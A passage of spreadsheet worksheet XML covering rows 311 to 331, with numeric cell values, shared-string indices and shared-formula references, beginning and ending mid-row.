      <c r="X311" s="45"/>
      <c r="Y311" s="45"/>
      <c r="Z311" s="38" t="s">
        <v>2020</v>
      </c>
      <c r="AA311" s="39" t="s">
        <v>2021</v>
      </c>
      <c r="AB311" s="38" t="s">
        <v>2022</v>
      </c>
      <c r="AC311" s="40">
        <v>108055.0</v>
      </c>
      <c r="AD311" s="5"/>
      <c r="AE311" s="14"/>
      <c r="AF311" s="14"/>
    </row>
    <row r="312">
      <c r="A312" s="6">
        <f t="shared" si="1"/>
        <v>0.3128868119</v>
      </c>
      <c r="B312" s="29">
        <v>1.0</v>
      </c>
      <c r="C312" s="15"/>
      <c r="D312" s="14"/>
      <c r="E312" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F312" s="14"/>
      <c r="G312" s="29">
        <v>1.0</v>
      </c>
      <c r="H312" s="29">
        <v>80.0</v>
      </c>
      <c r="I312" s="29">
        <v>87081.0</v>
      </c>
      <c r="J312" s="15"/>
      <c r="K312" s="29">
        <v>6253.0</v>
      </c>
      <c r="L312" s="15"/>
      <c r="M312" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N312" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O312" s="29">
        <v>0.0</v>
      </c>
      <c r="P312" s="29">
        <v>4.0</v>
      </c>
      <c r="Q312" s="15"/>
      <c r="R312" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S312" s="15"/>
      <c r="T312" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U312" s="5"/>
      <c r="V312" s="5"/>
      <c r="W312" s="47"/>
      <c r="X312" s="45"/>
      <c r="Y312" s="45"/>
      <c r="Z312" s="38" t="s">
        <v>2023</v>
      </c>
      <c r="AA312" s="39" t="s">
        <v>2024</v>
      </c>
      <c r="AB312" s="38" t="s">
        <v>2025</v>
      </c>
      <c r="AC312" s="40">
        <v>235356.0</v>
      </c>
      <c r="AD312" s="5"/>
      <c r="AE312" s="14"/>
      <c r="AF312" s="14"/>
    </row>
    <row r="313">
      <c r="A313" s="6">
        <f t="shared" si="1"/>
        <v>0.5722494784</v>
      </c>
      <c r="B313" s="29">
        <v>1.0</v>
      </c>
      <c r="C313" s="15"/>
      <c r="D313" s="14"/>
      <c r="E313" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F313" s="14"/>
      <c r="G313" s="29">
        <v>1.0</v>
      </c>
      <c r="H313" s="29">
        <v>58.0</v>
      </c>
      <c r="I313" s="29">
        <v>279003.0</v>
      </c>
      <c r="J313" s="15"/>
      <c r="K313" s="29">
        <v>6253.0</v>
      </c>
      <c r="L313" s="15"/>
      <c r="M313" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N313" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O313" s="29">
        <v>1.0</v>
      </c>
      <c r="P313" s="29">
        <v>3.0</v>
      </c>
      <c r="Q313" s="15"/>
      <c r="R313" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S313" s="15"/>
      <c r="T313" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U313" s="5"/>
      <c r="V313" s="5"/>
      <c r="W313" s="47"/>
      <c r="X313" s="45"/>
      <c r="Y313" s="45"/>
      <c r="Z313" s="38" t="s">
        <v>2026</v>
      </c>
      <c r="AA313" s="39" t="s">
        <v>2027</v>
      </c>
      <c r="AB313" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC313" s="40">
        <v>262515.0</v>
      </c>
      <c r="AD313" s="5"/>
      <c r="AE313" s="14"/>
      <c r="AF313" s="14"/>
    </row>
    <row r="314">
      <c r="A314" s="6">
        <f t="shared" si="1"/>
        <v>0.555486372</v>
      </c>
      <c r="B314" s="29">
        <v>1.0</v>
      </c>
      <c r="C314" s="29">
        <v>141370.0</v>
      </c>
      <c r="D314" s="14"/>
      <c r="E314" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F314" s="14"/>
      <c r="G314" s="29">
        <v>20.0</v>
      </c>
      <c r="H314" s="29">
        <v>2104.0</v>
      </c>
      <c r="I314" s="29">
        <v>127427.0</v>
      </c>
      <c r="J314" s="15"/>
      <c r="K314" s="29">
        <v>127427.0</v>
      </c>
      <c r="L314" s="15"/>
      <c r="M314" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N314" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O314" s="29">
        <v>1.0</v>
      </c>
      <c r="P314" s="29">
        <v>3.0</v>
      </c>
      <c r="Q314" s="15"/>
      <c r="R314" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S314" s="15"/>
      <c r="T314" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U314" s="5"/>
      <c r="V314" s="5"/>
      <c r="W314" s="47"/>
      <c r="X314" s="45"/>
      <c r="Y314" s="45"/>
      <c r="Z314" s="38" t="s">
        <v>2028</v>
      </c>
      <c r="AA314" s="39" t="s">
        <v>2029</v>
      </c>
      <c r="AB314" s="38" t="s">
        <v>2030</v>
      </c>
      <c r="AC314" s="40">
        <v>141348.0</v>
      </c>
      <c r="AD314" s="5"/>
      <c r="AE314" s="14"/>
      <c r="AF314" s="14"/>
    </row>
    <row r="315">
      <c r="A315" s="6">
        <f t="shared" si="1"/>
        <v>0.1472424457</v>
      </c>
      <c r="B315" s="29">
        <v>1.0</v>
      </c>
      <c r="C315" s="29">
        <v>97905.0</v>
      </c>
      <c r="D315" s="14"/>
      <c r="E315" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F315" s="14"/>
      <c r="G315" s="29">
        <v>1.0</v>
      </c>
      <c r="H315" s="29">
        <v>193.0</v>
      </c>
      <c r="I315" s="29">
        <v>84417.0</v>
      </c>
      <c r="J315" s="15"/>
      <c r="K315" s="29">
        <v>84417.0</v>
      </c>
      <c r="L315" s="15"/>
      <c r="M315" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N315" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O315" s="29">
        <v>2.0</v>
      </c>
      <c r="P315" s="29">
        <v>0.0</v>
      </c>
      <c r="Q315" s="15"/>
      <c r="R315" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S315" s="15"/>
      <c r="T315" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U315" s="5"/>
      <c r="V315" s="5"/>
      <c r="W315" s="47"/>
      <c r="X315" s="45"/>
      <c r="Y315" s="45"/>
      <c r="Z315" s="38" t="s">
        <v>2031</v>
      </c>
      <c r="AA315" s="39" t="s">
        <v>2032</v>
      </c>
      <c r="AB315" s="38" t="s">
        <v>1315</v>
      </c>
      <c r="AC315" s="40">
        <v>97900.0</v>
      </c>
      <c r="AD315" s="5"/>
      <c r="AE315" s="14"/>
      <c r="AF315" s="14"/>
    </row>
    <row r="316">
      <c r="A316" s="6">
        <f t="shared" si="1"/>
        <v>0.6671094595</v>
      </c>
      <c r="B316" s="29">
        <v>1.0</v>
      </c>
      <c r="C316" s="15"/>
      <c r="D316" s="14"/>
      <c r="E316" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F316" s="14"/>
      <c r="G316" s="29">
        <v>0.0</v>
      </c>
      <c r="H316" s="29">
        <v>236.0</v>
      </c>
      <c r="I316" s="29">
        <v>157341.0</v>
      </c>
      <c r="J316" s="15"/>
      <c r="K316" s="15"/>
      <c r="L316" s="15"/>
      <c r="M316" s="14"/>
      <c r="N316" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O316" s="29">
        <v>1.0</v>
      </c>
      <c r="P316" s="29">
        <v>0.0</v>
      </c>
      <c r="Q316" s="15"/>
      <c r="R316" s="15"/>
      <c r="S316" s="15"/>
      <c r="T316" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U316" s="5"/>
      <c r="V316" s="5"/>
      <c r="W316" s="47"/>
      <c r="X316" s="45"/>
      <c r="Y316" s="45"/>
      <c r="Z316" s="38" t="s">
        <v>2033</v>
      </c>
      <c r="AA316" s="39" t="s">
        <v>2034</v>
      </c>
      <c r="AB316" s="38" t="s">
        <v>2035</v>
      </c>
      <c r="AC316" s="40">
        <v>210468.0</v>
      </c>
      <c r="AD316" s="5"/>
      <c r="AE316" s="14"/>
      <c r="AF316" s="14"/>
    </row>
    <row r="317">
      <c r="A317" s="6">
        <f t="shared" si="1"/>
        <v>0.15539816</v>
      </c>
      <c r="B317" s="29">
        <v>1.0</v>
      </c>
      <c r="C317" s="15"/>
      <c r="D317" s="14"/>
      <c r="E317" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F317" s="14"/>
      <c r="G317" s="29">
        <v>1.0</v>
      </c>
      <c r="H317" s="29">
        <v>49.0</v>
      </c>
      <c r="I317" s="29">
        <v>251562.0</v>
      </c>
      <c r="J317" s="15"/>
      <c r="K317" s="29">
        <v>251562.0</v>
      </c>
      <c r="L317" s="15"/>
      <c r="M317" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N317" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O317" s="29">
        <v>0.0</v>
      </c>
      <c r="P317" s="29">
        <v>1.0</v>
      </c>
      <c r="Q317" s="15"/>
      <c r="R317" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S317" s="15"/>
      <c r="T317" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U317" s="5"/>
      <c r="V317" s="5"/>
      <c r="W317" s="47"/>
      <c r="X317" s="45"/>
      <c r="Y317" s="45"/>
      <c r="Z317" s="38" t="s">
        <v>2036</v>
      </c>
      <c r="AA317" s="39" t="s">
        <v>2037</v>
      </c>
      <c r="AB317" s="38" t="s">
        <v>2038</v>
      </c>
      <c r="AC317" s="40">
        <v>268228.0</v>
      </c>
      <c r="AD317" s="5"/>
      <c r="AE317" s="14"/>
      <c r="AF317" s="14"/>
    </row>
    <row r="318">
      <c r="A318" s="6">
        <f t="shared" si="1"/>
        <v>0.01961061987</v>
      </c>
      <c r="B318" s="29">
        <v>1.0</v>
      </c>
      <c r="C318" s="15"/>
      <c r="D318" s="14"/>
      <c r="E318" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F318" s="14"/>
      <c r="G318" s="29">
        <v>3.0</v>
      </c>
      <c r="H318" s="29">
        <v>396.0</v>
      </c>
      <c r="I318" s="29">
        <v>125315.0</v>
      </c>
      <c r="J318" s="15"/>
      <c r="K318" s="29">
        <v>125315.0</v>
      </c>
      <c r="L318" s="15"/>
      <c r="M318" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N318" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O318" s="29">
        <v>0.0</v>
      </c>
      <c r="P318" s="29">
        <v>2.0</v>
      </c>
      <c r="Q318" s="15"/>
      <c r="R318" s="15"/>
      <c r="S318" s="15"/>
      <c r="T318" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U318" s="5"/>
      <c r="V318" s="5"/>
      <c r="W318" s="47"/>
      <c r="X318" s="45"/>
      <c r="Y318" s="45"/>
      <c r="Z318" s="38" t="s">
        <v>2039</v>
      </c>
      <c r="AA318" s="39" t="s">
        <v>2040</v>
      </c>
      <c r="AB318" s="38" t="s">
        <v>2041</v>
      </c>
      <c r="AC318" s="40">
        <v>204315.0</v>
      </c>
      <c r="AD318" s="5"/>
      <c r="AE318" s="14"/>
      <c r="AF318" s="14"/>
    </row>
    <row r="319">
      <c r="A319" s="6">
        <f t="shared" si="1"/>
        <v>0.8851893619</v>
      </c>
      <c r="B319" s="29">
        <v>1.0</v>
      </c>
      <c r="C319" s="14"/>
      <c r="D319" s="14"/>
      <c r="E319" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F319" s="14"/>
      <c r="G319" s="29">
        <v>2.0</v>
      </c>
      <c r="H319" s="29">
        <v>234.0</v>
      </c>
      <c r="I319" s="29">
        <v>162687.0</v>
      </c>
      <c r="J319" s="15"/>
      <c r="K319" s="15"/>
      <c r="L319" s="15"/>
      <c r="M319" s="14"/>
      <c r="N319" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O319" s="29">
        <v>1.0</v>
      </c>
      <c r="P319" s="29">
        <v>1.0</v>
      </c>
      <c r="Q319" s="15"/>
      <c r="R319" s="15"/>
      <c r="S319" s="15"/>
      <c r="T319" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U319" s="5"/>
      <c r="V319" s="5"/>
      <c r="W319" s="47"/>
      <c r="X319" s="45"/>
      <c r="Y319" s="45"/>
      <c r="Z319" s="38" t="s">
        <v>2042</v>
      </c>
      <c r="AA319" s="39" t="s">
        <v>2043</v>
      </c>
      <c r="AB319" s="38" t="s">
        <v>2044</v>
      </c>
      <c r="AC319" s="40">
        <v>172514.0</v>
      </c>
      <c r="AD319" s="5"/>
      <c r="AE319" s="14"/>
      <c r="AF319" s="14"/>
    </row>
    <row r="320">
      <c r="A320" s="6">
        <f t="shared" si="1"/>
        <v>0.1858885158</v>
      </c>
      <c r="B320" s="29">
        <v>1.0</v>
      </c>
      <c r="C320" s="14"/>
      <c r="D320" s="14"/>
      <c r="E320" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F320" s="14"/>
      <c r="G320" s="29">
        <v>1.0</v>
      </c>
      <c r="H320" s="29">
        <v>28.0</v>
      </c>
      <c r="I320" s="29">
        <v>95029.0</v>
      </c>
      <c r="J320" s="15"/>
      <c r="K320" s="15"/>
      <c r="L320" s="15"/>
      <c r="M320" s="14"/>
      <c r="N320" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O320" s="29">
        <v>0.0</v>
      </c>
      <c r="P320" s="29">
        <v>1.0</v>
      </c>
      <c r="Q320" s="15"/>
      <c r="R320" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S320" s="15"/>
      <c r="T320" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U320" s="5"/>
      <c r="V320" s="5"/>
      <c r="W320" s="47"/>
      <c r="X320" s="45"/>
      <c r="Y320" s="45"/>
      <c r="Z320" s="38" t="s">
        <v>2045</v>
      </c>
      <c r="AA320" s="39" t="s">
        <v>2046</v>
      </c>
      <c r="AB320" s="38" t="s">
        <v>1454</v>
      </c>
      <c r="AC320" s="40">
        <v>108658.0</v>
      </c>
      <c r="AD320" s="5"/>
      <c r="AE320" s="14"/>
      <c r="AF320" s="14"/>
    </row>
    <row r="321">
      <c r="A321" s="6">
        <f t="shared" si="1"/>
        <v>0.4341201639</v>
      </c>
      <c r="B321" s="29">
        <v>1.0</v>
      </c>
      <c r="C321" s="15"/>
      <c r="D321" s="14"/>
      <c r="E321" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F321" s="14"/>
      <c r="G321" s="29">
        <v>3.0</v>
      </c>
      <c r="H321" s="29">
        <v>307.0</v>
      </c>
      <c r="I321" s="29">
        <v>119035.0</v>
      </c>
      <c r="J321" s="15"/>
      <c r="K321" s="29">
        <v>155194.0</v>
      </c>
      <c r="L321" s="15"/>
      <c r="M321" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N321" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O321" s="29">
        <v>4.0</v>
      </c>
      <c r="P321" s="29">
        <v>3.0</v>
      </c>
      <c r="Q321" s="15"/>
      <c r="R321" s="15"/>
      <c r="S321" s="15"/>
      <c r="T321" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U321" s="5"/>
      <c r="V321" s="5"/>
      <c r="W321" s="47"/>
      <c r="X321" s="45"/>
      <c r="Y321" s="45"/>
      <c r="Z321" s="38" t="s">
        <v>2047</v>
      </c>
      <c r="AA321" s="39" t="s">
        <v>2048</v>
      </c>
      <c r="AB321" s="38" t="s">
        <v>1247</v>
      </c>
      <c r="AC321" s="40">
        <v>173094.0</v>
      </c>
      <c r="AD321" s="5"/>
      <c r="AE321" s="14"/>
      <c r="AF321" s="14"/>
    </row>
    <row r="322">
      <c r="A322" s="6">
        <f t="shared" si="1"/>
        <v>0.05194507362</v>
      </c>
      <c r="B322" s="29">
        <v>1.0</v>
      </c>
      <c r="C322" s="29">
        <v>99639.0</v>
      </c>
      <c r="D322" s="14"/>
      <c r="E322" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F322" s="14"/>
      <c r="G322" s="29">
        <v>0.0</v>
      </c>
      <c r="H322" s="29">
        <v>195.0</v>
      </c>
      <c r="I322" s="29">
        <v>86135.0</v>
      </c>
      <c r="J322" s="15"/>
      <c r="K322" s="29">
        <v>86135.0</v>
      </c>
      <c r="L322" s="15"/>
      <c r="M322" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N322" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O322" s="29">
        <v>1.0</v>
      </c>
      <c r="P322" s="29">
        <v>3.0</v>
      </c>
      <c r="Q322" s="15"/>
      <c r="R322" s="15"/>
      <c r="S322" s="15"/>
      <c r="T322" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U322" s="5"/>
      <c r="V322" s="5"/>
      <c r="W322" s="47"/>
      <c r="X322" s="45"/>
      <c r="Y322" s="45"/>
      <c r="Z322" s="38" t="s">
        <v>2049</v>
      </c>
      <c r="AA322" s="39" t="s">
        <v>2050</v>
      </c>
      <c r="AB322" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC322" s="40">
        <v>99637.0</v>
      </c>
      <c r="AD322" s="5"/>
      <c r="AE322" s="14"/>
      <c r="AF322" s="14"/>
    </row>
    <row r="323">
      <c r="A323" s="6">
        <f t="shared" si="1"/>
        <v>0.9307941664</v>
      </c>
      <c r="B323" s="29">
        <v>1.0</v>
      </c>
      <c r="C323" s="29">
        <v>118784.0</v>
      </c>
      <c r="D323" s="14"/>
      <c r="E323" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F323" s="14"/>
      <c r="G323" s="29">
        <v>0.0</v>
      </c>
      <c r="H323" s="29">
        <v>189.0</v>
      </c>
      <c r="I323" s="29">
        <v>67251.0</v>
      </c>
      <c r="J323" s="15"/>
      <c r="K323" s="29">
        <v>-1.0</v>
      </c>
      <c r="L323" s="15"/>
      <c r="M323" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N323" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O323" s="29">
        <v>1.0</v>
      </c>
      <c r="P323" s="29">
        <v>8.0</v>
      </c>
      <c r="Q323" s="15"/>
      <c r="R323" s="15"/>
      <c r="S323" s="15"/>
      <c r="T323" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U323" s="5"/>
      <c r="V323" s="5"/>
      <c r="W323" s="47"/>
      <c r="X323" s="45"/>
      <c r="Y323" s="45"/>
      <c r="Z323" s="38" t="s">
        <v>2051</v>
      </c>
      <c r="AA323" s="39" t="s">
        <v>2052</v>
      </c>
      <c r="AB323" s="38" t="s">
        <v>299</v>
      </c>
      <c r="AC323" s="40">
        <v>118782.0</v>
      </c>
      <c r="AD323" s="5"/>
      <c r="AE323" s="14"/>
      <c r="AF323" s="14"/>
    </row>
    <row r="324">
      <c r="A324" s="6">
        <f t="shared" si="1"/>
        <v>0.9466575825</v>
      </c>
      <c r="B324" s="29">
        <v>1.0</v>
      </c>
      <c r="C324" s="29">
        <v>267926.0</v>
      </c>
      <c r="D324" s="14"/>
      <c r="E324" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F324" s="14"/>
      <c r="G324" s="29">
        <v>1.0</v>
      </c>
      <c r="H324" s="29">
        <v>121.0</v>
      </c>
      <c r="I324" s="29">
        <v>218428.0</v>
      </c>
      <c r="J324" s="15"/>
      <c r="K324" s="15"/>
      <c r="L324" s="15"/>
      <c r="M324" s="15"/>
      <c r="N324" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O324" s="29">
        <v>2.0</v>
      </c>
      <c r="P324" s="29">
        <v>0.0</v>
      </c>
      <c r="Q324" s="15"/>
      <c r="R324" s="15"/>
      <c r="S324" s="15"/>
      <c r="T324" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U324" s="5"/>
      <c r="V324" s="5"/>
      <c r="W324" s="47"/>
      <c r="X324" s="45"/>
      <c r="Y324" s="45"/>
      <c r="Z324" s="38" t="s">
        <v>2053</v>
      </c>
      <c r="AA324" s="39" t="s">
        <v>2054</v>
      </c>
      <c r="AB324" s="38" t="s">
        <v>2055</v>
      </c>
      <c r="AC324" s="40">
        <v>267918.0</v>
      </c>
      <c r="AD324" s="5"/>
      <c r="AE324" s="14"/>
      <c r="AF324" s="14"/>
    </row>
    <row r="325">
      <c r="A325" s="6">
        <f t="shared" si="1"/>
        <v>0.8051503899</v>
      </c>
      <c r="B325" s="29">
        <v>1.0</v>
      </c>
      <c r="C325" s="29">
        <v>45329.0</v>
      </c>
      <c r="D325" s="14"/>
      <c r="E325" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F325" s="14"/>
      <c r="G325" s="29">
        <v>2.0</v>
      </c>
      <c r="H325" s="29">
        <v>419.0</v>
      </c>
      <c r="I325" s="29">
        <v>34108.0</v>
      </c>
      <c r="J325" s="15"/>
      <c r="K325" s="15"/>
      <c r="L325" s="15"/>
      <c r="M325" s="14"/>
      <c r="N325" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O325" s="29">
        <v>4.0</v>
      </c>
      <c r="P325" s="29">
        <v>0.0</v>
      </c>
      <c r="Q325" s="15"/>
      <c r="R325" s="15"/>
      <c r="S325" s="15"/>
      <c r="T325" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U325" s="5"/>
      <c r="V325" s="5"/>
      <c r="W325" s="47"/>
      <c r="X325" s="45"/>
      <c r="Y325" s="45"/>
      <c r="Z325" s="38" t="s">
        <v>2056</v>
      </c>
      <c r="AA325" s="39" t="s">
        <v>2057</v>
      </c>
      <c r="AB325" s="38" t="s">
        <v>2058</v>
      </c>
      <c r="AC325" s="40">
        <v>45328.0</v>
      </c>
      <c r="AD325" s="5"/>
      <c r="AE325" s="14"/>
      <c r="AF325" s="14"/>
    </row>
    <row r="326">
      <c r="A326" s="6">
        <f t="shared" si="1"/>
        <v>0.732911162</v>
      </c>
      <c r="B326" s="29">
        <v>1.0</v>
      </c>
      <c r="C326" s="14"/>
      <c r="D326" s="14"/>
      <c r="E326" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F326" s="14"/>
      <c r="G326" s="29">
        <v>0.0</v>
      </c>
      <c r="H326" s="29">
        <v>26.0</v>
      </c>
      <c r="I326" s="29">
        <v>285479.0</v>
      </c>
      <c r="J326" s="15"/>
      <c r="K326" s="29">
        <v>6253.0</v>
      </c>
      <c r="L326" s="15"/>
      <c r="M326" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N326" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O326" s="29">
        <v>0.0</v>
      </c>
      <c r="P326" s="29">
        <v>6.0</v>
      </c>
      <c r="Q326" s="15"/>
      <c r="R326" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S326" s="15"/>
      <c r="T326" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U326" s="5"/>
      <c r="V326" s="5"/>
      <c r="W326" s="47"/>
      <c r="X326" s="45"/>
      <c r="Y326" s="45"/>
      <c r="Z326" s="38" t="s">
        <v>2059</v>
      </c>
      <c r="AA326" s="39" t="s">
        <v>2060</v>
      </c>
      <c r="AB326" s="38" t="s">
        <v>2061</v>
      </c>
      <c r="AC326" s="40">
        <v>266346.0</v>
      </c>
      <c r="AD326" s="5"/>
      <c r="AE326" s="14"/>
      <c r="AF326" s="14"/>
    </row>
    <row r="327">
      <c r="A327" s="6">
        <f t="shared" si="1"/>
        <v>0.4277828287</v>
      </c>
      <c r="B327" s="29">
        <v>1.0</v>
      </c>
      <c r="C327" s="15"/>
      <c r="D327" s="14"/>
      <c r="E327" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F327" s="14"/>
      <c r="G327" s="29">
        <v>6.0</v>
      </c>
      <c r="H327" s="29">
        <v>24017.0</v>
      </c>
      <c r="I327" s="29">
        <v>63847.0</v>
      </c>
      <c r="J327" s="15"/>
      <c r="K327" s="15"/>
      <c r="L327" s="15"/>
      <c r="M327" s="15"/>
      <c r="N327" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O327" s="29">
        <v>1.0</v>
      </c>
      <c r="P327" s="29">
        <v>0.0</v>
      </c>
      <c r="Q327" s="15"/>
      <c r="R327" s="15"/>
      <c r="S327" s="15"/>
      <c r="T327" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U327" s="5"/>
      <c r="V327" s="5"/>
      <c r="W327" s="47"/>
      <c r="X327" s="45"/>
      <c r="Y327" s="45"/>
      <c r="Z327" s="38" t="s">
        <v>2062</v>
      </c>
      <c r="AA327" s="39" t="s">
        <v>2063</v>
      </c>
      <c r="AB327" s="38" t="s">
        <v>2064</v>
      </c>
      <c r="AC327" s="40">
        <v>202773.0</v>
      </c>
      <c r="AD327" s="5"/>
      <c r="AE327" s="14"/>
      <c r="AF327" s="14"/>
    </row>
    <row r="328">
      <c r="A328" s="6">
        <f t="shared" si="1"/>
        <v>0.5997938742</v>
      </c>
      <c r="B328" s="29">
        <v>1.0</v>
      </c>
      <c r="C328" s="29">
        <v>200836.0</v>
      </c>
      <c r="D328" s="14"/>
      <c r="E328" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F328" s="14"/>
      <c r="G328" s="29">
        <v>1.0</v>
      </c>
      <c r="H328" s="29">
        <v>240.0</v>
      </c>
      <c r="I328" s="29">
        <v>156898.0</v>
      </c>
      <c r="J328" s="15"/>
      <c r="K328" s="15"/>
      <c r="L328" s="15"/>
      <c r="M328" s="14"/>
      <c r="N328" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O328" s="29">
        <v>1.0</v>
      </c>
      <c r="P328" s="29">
        <v>0.0</v>
      </c>
      <c r="Q328" s="15"/>
      <c r="R328" s="15"/>
      <c r="S328" s="15"/>
      <c r="T328" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U328" s="5"/>
      <c r="V328" s="5"/>
      <c r="W328" s="47"/>
      <c r="X328" s="45"/>
      <c r="Y328" s="45"/>
      <c r="Z328" s="38" t="s">
        <v>2065</v>
      </c>
      <c r="AA328" s="39" t="s">
        <v>2066</v>
      </c>
      <c r="AB328" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC328" s="40">
        <v>200835.0</v>
      </c>
      <c r="AD328" s="5"/>
      <c r="AE328" s="14"/>
      <c r="AF328" s="14"/>
    </row>
    <row r="329">
      <c r="A329" s="6">
        <f t="shared" si="1"/>
        <v>0.9254074845</v>
      </c>
      <c r="B329" s="29">
        <v>1.0</v>
      </c>
      <c r="C329" s="15"/>
      <c r="D329" s="14"/>
      <c r="E329" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F329" s="14"/>
      <c r="G329" s="29">
        <v>0.0</v>
      </c>
      <c r="H329" s="29">
        <v>88.0</v>
      </c>
      <c r="I329" s="29">
        <v>289257.0</v>
      </c>
      <c r="J329" s="15"/>
      <c r="K329" s="29">
        <v>289257.0</v>
      </c>
      <c r="L329" s="15"/>
      <c r="M329" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N329" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O329" s="29">
        <v>0.0</v>
      </c>
      <c r="P329" s="29">
        <v>1.0</v>
      </c>
      <c r="Q329" s="15"/>
      <c r="R329" s="15"/>
      <c r="S329" s="15"/>
      <c r="T329" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U329" s="5"/>
      <c r="V329" s="5"/>
      <c r="W329" s="47"/>
      <c r="X329" s="45"/>
      <c r="Y329" s="45"/>
      <c r="Z329" s="38" t="s">
        <v>2067</v>
      </c>
      <c r="AA329" s="39" t="s">
        <v>2068</v>
      </c>
      <c r="AB329" s="38" t="s">
        <v>2069</v>
      </c>
      <c r="AC329" s="40">
        <v>268433.0</v>
      </c>
      <c r="AD329" s="5"/>
      <c r="AE329" s="14"/>
      <c r="AF329" s="14"/>
    </row>
    <row r="330">
      <c r="A330" s="6">
        <f t="shared" si="1"/>
        <v>0.8822005061</v>
      </c>
      <c r="B330" s="29">
        <v>1.0</v>
      </c>
      <c r="C330" s="29">
        <v>83439.0</v>
      </c>
      <c r="D330" s="14"/>
      <c r="E330" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F330" s="14"/>
      <c r="G330" s="29">
        <v>2.0</v>
      </c>
      <c r="H330" s="29">
        <v>504.0</v>
      </c>
      <c r="I330" s="15"/>
      <c r="J330" s="5" t="s">
        <v>2070</v>
      </c>
      <c r="K330" s="29">
        <v>37.0</v>
      </c>
      <c r="L330" s="15"/>
      <c r="M330" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N330" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O330" s="29">
        <v>4.0</v>
      </c>
      <c r="P330" s="29">
        <v>0.0</v>
      </c>
      <c r="Q330" s="15"/>
      <c r="R330" s="15"/>
      <c r="S330" s="15"/>
      <c r="T330" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U330" s="5"/>
      <c r="V330" s="5"/>
      <c r="W330" s="47"/>
      <c r="X330" s="45"/>
      <c r="Y330" s="45"/>
      <c r="Z330" s="38" t="s">
        <v>2071</v>
      </c>
      <c r="AA330" s="39" t="s">
        <v>2072</v>
      </c>
      <c r="AB330" s="38" t="s">
        <v>2073</v>
      </c>
      <c r="AC330" s="40">
        <v>83415.0</v>
      </c>
      <c r="AD330" s="5"/>
      <c r="AE330" s="14"/>
      <c r="AF330" s="14"/>
    </row>
    <row r="331">
      <c r="A331" s="6">
        <f t="shared" si="1"/>
        <v>0.3837203234</v>
      </c>
      <c r="B331" s="29">
        <v>1.0</v>
      </c>
      <c r="C331" s="14"/>
      <c r="D331" s="14"/>
      <c r="E331" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F331" s="14"/>
      <c r="G331" s="29">
        <v>2.0</v>
      </c>
      <c r="H331" s="29">
        <v>166.0</v>
      </c>
      <c r="I331" s="29">
        <v>125392.0</v>
      </c>
